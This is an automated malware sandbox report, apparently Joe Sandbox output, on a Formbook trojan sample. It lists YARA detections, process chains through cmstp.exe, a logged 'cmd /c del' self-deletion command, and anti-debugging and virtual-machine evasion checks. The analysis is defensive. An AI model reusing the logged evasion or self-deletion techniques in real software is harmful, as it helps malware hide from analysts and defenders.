          Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@15/10
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_00404201 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_01
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeFile created: C:\Users\user\AppData\Local\Temp\nsmDEE2.tmpJump to behavior
          Source: LWlcpDjYIQ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: LWlcpDjYIQ.exeReversingLabs: Detection: 65%
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeFile read: C:\Users\user\Desktop\LWlcpDjYIQ.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\LWlcpDjYIQ.exe 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess created: C:\Users\user\Desktop\LWlcpDjYIQ.exe 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess created: C:\Users\user\Desktop\LWlcpDjYIQ.exe 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\LWlcpDjYIQ.exe'
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: cmstp.pdbGCTL source: LWlcpDjYIQ.exe, 00000002.00000002.256547466.0000000000960000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: LWlcpDjYIQ.exe, 00000000.00000003.210847086.000000001ECE0000.00000004.00000001.sdmp, LWlcpDjYIQ.exe, 00000002.00000002.256684216.0000000000B1F000.00000040.00000001.sdmp, cmstp.exe, 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: LWlcpDjYIQ.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: LWlcpDjYIQ.exe, 00000002.00000002.256547466.0000000000960000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeUnpacked PE file: 2.2.LWlcpDjYIQ.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041535C push ebp; ret
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00414EE8 push esi; ret
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A7D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_046CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285B3FB push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285535C push ebp; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_02854EE8 push esi; ret
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 7_2_0285B45C push eax; ret
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeFile created: C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dllJump to dropped file
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 00000000028485E4 second address: 00000000028485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 000000000284896E second address: 0000000002848974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_004088A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 4332Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 5616Thread sleep time: -52000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000005.00000000.235946157.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.235946157.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000005.00000000.235733242.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.235267416.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.229986245.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000005.00000002.475804173.0000000001438000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000005.00000000.235946157.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.235946157.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.236039343.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000002.488038344.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000005.00000000.235267416.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.235946157.000000000871F000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.235267416.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.229143508.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000005.00000000.235267416.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_737F1000 Hyvkfcorf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_0291160D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 0_2_02911825 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A29080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AF1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A4C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A52990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00AB41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A44120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A5513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\LWlcpDjYIQ.exeCode function: 2_2_00A2B171 mov eax, dword ptr fs:[00000030h]
